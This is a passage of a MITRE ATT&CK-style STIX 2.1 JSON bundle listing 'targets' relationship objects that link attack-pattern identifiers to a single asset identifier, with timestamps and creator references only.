"identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f2cdbe83-0531-498d-a28d-87aa60cbf5ec", "created": "2024-07-01T10:37:15.831055", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831057", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b97f1d35-4249-4486-a6b5-ee60ccf24fab", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f2ea0f63-f7a1-4c75-885e-a94881f6b8b8", "created": "2024-07-01T10:37:15.831065", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831067", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ba04e672-da86-4e69-aa15-0eca5db25f43", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--89bd1da6-850a-4a45-8d30-caea4e0c2677", "created": "2024-07-01T10:37:15.831075", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831077", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8b0ccca7-d560-4e60-8b9c-30970b262878", "created": "2024-07-01T10:37:15.831085", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831087", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bb5e59c4-abe7-40c7-8196-e373cb1e5974", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--51d98d0f-047a-438d-a376-936b9e74ffb0", "created": "2024-07-01T10:37:15.831095", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831097", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bc0f5e80-91c0-4e04-9fbb-e4e332c85dae", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--92cbae1b-e074-4836-a1ef-b5768b7c7bf1", "created": "2024-07-01T10:37:15.831104", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831106", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bd369cd9-abb8-41ce-b5bb-fff23ee86c00", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--535d3781-26d1-47e3-9d88-d80084686ecc", "created": "2024-07-01T10:37:15.831114", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831116", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7cd48c39-ce18-4723-90b2-53d4e904fe10", "created": "2024-07-01T10:37:15.831124", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831126", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--12f32d5a-0a98-4341-a510-a1e1c4ddb6da", "created": "2024-07-01T10:37:15.831134", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831136", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--edf4c76a-17b8-4dc8-8dae-e5c145f7a099", "created": "2024-07-01T10:37:15.831144", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831146", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bef8aaee-961d-4359-a308-4c2182bcedff", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--28e566bc-e6cc-49bc-b472-c6c349b7a3f6", "created": "2024-07-01T10:37:15.831154", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831156", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bf147104-abf9-4221-95d1-e81585859441", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d4224db1-1003-44b4-b354-8db4e0d0a38f", "created": "2024-07-01T10:37:15.831164", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831166", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--34cd2642-072e-4e35-a048-9197714ca1cf", "created": "2024-07-01T10:37:15.831174", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831176", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bf1b6176-597c-4600-bfcd-ac989670f96b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b215da8a-a1c5-4f3d-bf91-dd947bc11fa9", "created": "2024-07-01T10:37:15.831184", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831186", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bf90d72c-c00b-45e3-b3aa-68560560d4c5", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--01da81fa-93fd-4e5e-8492-a287a55f150b", "created": "2024-07-01T10:37:15.831194", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831196", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7c3d85fc-2bb3-4761-98c2-1f46467fec1e", "created": "2024-07-01T10:37:15.831204", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831206", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c1b68a96-3c48-49ea-a6c0-9b27359f9c19", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ad9e7971-a354-4a18-bd41-fcb464611cef", "created": "2024-07-01T10:37:15.831214", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831216", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1f17cc47-0cd9-426f-bb9e-ddd0da652617", "created": "2024-07-01T10:37:15.831224", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831226", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--03af6022-4a73-4f39-841a-329e7796f4fe", "created": "2024-07-01T10:37:15.831234", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831236", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--df974e91-cf1e-4b63-9d4d-9e33c3e454b5", "created": "2024-07-01T10:37:15.831243", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831246", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c32f7008-9fea-41f7-8366-5eb9b74bd896", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c7427544-68ed-46ff-b7f2-a656dc4766fa", "created": "2024-07-01T10:37:15.831253", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831255", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c3888c54-775d-4b2f-b759-75a2ececcbfd", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c9c93e77-4929-44b7-a3f3-057fa0fb77b1", "created": "2024-07-01T10:37:15.831263", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831265", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5ef9bbdd-c01f-4d89-aad4-8c858bc2950b", "created": "2024-07-01T10:37:15.831273", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831275", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c48a67ee-b657-45c1-91bf-6cdbe27205f8", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--09f9f648-2e1a-45c2-9b93-ba27b023d25c", "created": "2024-07-01T10:37:15.831283", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831285", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c615231b-f253-4f58-9d47-d5b4cbdb6839", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9bd9d182-843a-4166-b840-6a16751e8378", "created": "2024-07-01T10:37:15.831293", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831295", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c63a348e-ffc2-486a-b9d9-d7f11ec54d99", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--08ca9bc0-25b6-422c-9d4d-7943c33b8d33", "created": "2024-07-01T10:37:15.831303", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831305", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c675646d-e204-4aa8-978d-e3d6d65885c4", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c7a72d07-fdc2-49d7-86ab-11b7573e7675", "created": "2024-07-01T10:37:15.831313", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831315", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9945b3e4-1830-4e98-a826-0c7e3a449d0f", "created": "2024-07-01T10:37:15.831323", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831325", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5f373837-19e0-4130-bff0-b232a674c6f6", "created": "2024-07-01T10:37:15.831333", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831335", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c898c4b5-bf36-4e6e-a4ad-5b8c4c13e35b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0e4f7122-b760-4ba0-bdcc-11d5955a4dcf", "created": "2024-07-01T10:37:15.831343", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831345", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c8e87b83-edbb-48d4-9295-4974897525b7", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cde01c75-e9aa-4487-af71-0edc843c29a5", "created": "2024-07-01T10:37:15.831353", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831355", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c92e3d68-2349-49e4-a341-7edca2deff96", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--dd046d2d-34eb-499c-9ea9-3aad1fe20e3e", "created": "2024-07-01T10:37:15.831362", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831364", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c9e0c59e-162e-40a4-b8b1-78fab4329ada", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--44342125-3f6b-475d-9587-26a53c973b6d", "created": "2024-07-01T10:37:15.831372", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831374", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ca9d3402-ada3-484d-876a-d717bd6e05f2", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fbb65342-a05e-4cb1-8b07-507d5629c166", "created": "2024-07-01T10:37:15.831382", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831384", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cabe189c-a0e3-4965-a473-dcff00f17213", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--685f5ee7-90aa-4582-a06c-a9224fd22c84", "created": "2024-07-01T10:37:15.831392", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831394", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9bc58b11-2f65-46d2-825c-5feecf8c089b", "created": "2024-07-01T10:37:15.831402", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831404", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cbb66055-0325-4111-aca0-40547b6ad5b0", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6d7979cb-b5f8-4ab4-93b1-88330868338b", "created": "2024-07-01T10:37:15.831411", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831413", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--91ee2600-65c3-41ec-8070-0a93451894ec", "created": "2024-07-01T10:37:15.831421", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831423", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b7964e5a-ee5e-4bad-aa80-97129f8c6ecd", "created": "2024-07-01T10:37:15.831431", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831433", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cc89ecbd-3d33-4a41-bcca-001e702d18fd", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7e50e183-2849-412f-8511-5933405d9a82", "created": "2024-07-01T10:37:15.831441", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831443", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cd25c1b4-935c-4f0e-ba8d-552f28bc4783", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ce368346-9d05-4d09-bc23-ad46366549b6", "created": "2024-07-01T10:37:15.831451", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831453", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ce4b7013-640e-48a9-b501-d0025a95f4bf", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": 